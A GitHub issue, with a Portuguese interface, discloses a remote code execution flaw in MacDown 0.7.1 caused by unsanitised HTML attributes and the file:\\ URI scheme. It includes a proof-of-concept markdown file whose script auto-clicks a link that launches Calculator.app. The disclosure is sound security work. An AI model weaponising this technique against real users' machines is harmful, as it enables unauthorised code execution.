MacDownApp/macdown
Ver no GitHubMacdown Version 0.7.1 (870) Remote Code Execution
Open
#1.050 aberto em 28 de jan. de 2019
help wantedon hold
Métricas do repositório
- Stars
- (7.686 stars)
- Métricas de merge de PR
- (Nenhuma PRs mesclada em 30d)
Description
Macdown Version 0.7.1 (870) Remote Code Execution
Macdown version 0.7.1 (870) is affected by a remote code execution vulnerability. Macdown fails to sanitize input on HTML attributes. Abusing thefile:\\ URI scheme on HTML attributes can result in arbitrary code execution. The attached proof of concept will execute the MacOS Calculator.app when opened inside of Macdown.
PoC (PoC.md):
<!DOCTYPE html>
<html>
<body>
<a href="file:\\\Applications\Calculator.app" id=exploit download>
<img src="/images/exploit.jpg" alt="exploit" width="104" height="142">
</a>
<script>
(function download() {
document.getElementById('exploit').click();
})()
</script>
</body>
</html>
Screenshot: